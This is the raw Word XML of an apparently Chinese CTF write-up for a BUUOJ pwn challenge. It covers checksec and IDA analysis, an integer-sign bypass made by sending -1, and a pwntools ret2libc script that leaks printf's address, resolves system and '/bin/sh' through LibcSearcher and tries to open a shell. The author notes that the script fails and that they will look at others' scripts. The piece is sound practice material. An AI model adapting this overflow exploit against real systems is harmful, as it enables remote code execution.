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44B54" w14:textId="77777777" w:rsidR="00600B42" w:rsidRDefault="00600B42" w:rsidP="00600B42">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Checksec一下文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00600B42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60208704" wp14:editId="5AE8864F">
            <wp:extent cx="5168900" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1110054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A8C70" w14:textId="77777777" w:rsidR="00600B42" w:rsidRDefault="00600B42" w:rsidP="00600B42">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放到32位ida中看一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00600B42">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25756715" wp14:editId="24005710">
            <wp:extent cx="5274310" cy="992505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="532610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0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8400" w14:textId="77777777" w:rsidR="00600B42" w:rsidRDefault="00600B42" w:rsidP="00600B42">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00600B42">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C18D0C3" wp14:editId="1F0D9B6A">
            <wp:extent cx="5274310" cy="2234565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="40236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63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A947" w14:textId="77777777" w:rsidR="002273BA" w:rsidRDefault="002273BA" w:rsidP="00600B42">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>他这次只是检查是否大于32，如果不大于32则可以继续进行程序，如果大于则退出程序，然后后面又把v2变成无符号整型，所以给它赋值一个-1就会很大</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8C1E4" w14:textId="77777777" w:rsidR="002273BA" w:rsidRDefault="002273BA" w:rsidP="00600B42">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002273BA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680FEB6D" wp14:editId="45C79E19">
            <wp:extent cx="4667250" cy="1035050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14036197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30B0B" w14:textId="77777777" w:rsidR="00227FF4" w:rsidRDefault="00227FF4" w:rsidP="00600B42">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shift+f12</w:t>
      </w:r>
      <w:r w:rsidRPr="00227FF4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1608F555" wp14:editId="70B885F5">
            <wp:extent cx="5274310" cy="1750695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="149824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55D9" w14:textId="77777777" w:rsidR="00227FF4" w:rsidRDefault="00227FF4" w:rsidP="00600B42">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在dothing发现int80</w:t>
      </w:r>
      <w:r w:rsidRPr="00227FF4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F7FE2A" wp14:editId="51DE7C54">
            <wp:extent cx="5274310" cy="2632710"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1914670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0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5027" w14:textId="77777777" w:rsidR="00F8665F" w:rsidRDefault="00F8665F" w:rsidP="00600B42">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为这道题没找到是没有用函数，所以想到用libc来做</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F44DEB5" w14:textId="625BB6FA" w:rsidR="00F8665F" w:rsidRDefault="00F8665F" w:rsidP="001B29B1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A740B06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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D7DC3D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from LibcSearcher import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04290221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34436A08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 = remote("node5.buuoj.cn", 29840)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194777AC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elf = ELF("pwn")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C6AEE4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12303D84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printf_plt = elf.plt["printf"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB4BEE0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printf_got = elf.got["printf"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340B93FB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main = elf.sym["main"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B38E0A5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100EF954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p.recvuntil(b"How many bytes do you want me to read?")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297FC7C2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p.sendline(b'-1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F38D1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p.recvuntil(b'\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D36D84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481D0E49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offset = 0x2c+4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB9DC3D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payload1 = b"A" * offset + p32(printf_plt) + p32(main) + p32(printf_got)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42E234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66ECE11F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p.sendline(payload1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28854265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1B50F842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printf_addr = u32(p.recv(4).ljust(4, b"\x00"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50AE1B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0E340925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libc = LibcSearcher("printf", printf_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F80EB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libc_base = printf_addr - libc.dump("printf")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E11A537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system_addr = libc_base + libc.dump("system")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FC13E9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bin_sh_addr = libc_base + libc.dump("str_bin_sh")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22949EE6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3AA09B72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p.recvuntil(b"How many bytes do you want me to read?")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E783F9A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p.sendline(b'-1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262CD2F6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p.recvuntil(b'\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A5DCF1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1619DE86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payload2 = b"A" * offset + p32(system_addr) + p32(main) + p32(bin_sh_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797A6D67" w14:textId="77777777" w:rsidR="001B29B1" w:rsidRDefault="001B29B1" w:rsidP="001B29B1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C4077F" w14:textId="77777777" w:rsidR="001B29B1" w:rsidRDefault="001B29B1" w:rsidP="001B29B1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.sendline(payload2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F91307" w14:textId="1FE2AE7B" w:rsidR="001B29B1" w:rsidRDefault="001B29B1" w:rsidP="001B29B1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD5CC6D" w14:textId="1932FEDD" w:rsidR="001B29B1" w:rsidRDefault="001B29B1" w:rsidP="001B29B1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是打不进去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3927DCB8" w14:textId="025768B9" w:rsidR="001B29B1" w:rsidRDefault="001B29B1" w:rsidP="001B29B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4．看一下别人的脚本</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001B2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74933"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81646AD0"/>
    <w:lvl w:ilvl="0" w:tplc="EA847DB8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90338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42"/>
    <w:rsid w:val="000B5AC5"/>
    <w:rsid w:val="001B29B1"/>
    <w:rsid w:val="002273BA"/>
    <w:rsid w:val="00227FF4"/>
    <w:rsid w:val="00600B42"/>
    <w:rsid w:val="00F8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5C9ED"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{722222BB-A34F-44D5-8656-F51034169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0B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0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0B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0B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0B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0B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0B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0B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0B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0B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0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0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0B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0B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0B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0B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0B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0B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0B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0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0B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0B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0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0B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0B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0B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0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0B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0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442</Words>
  <Characters>571</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>51</Lines>
  <Paragraphs>44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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-27T11:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-28T08:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>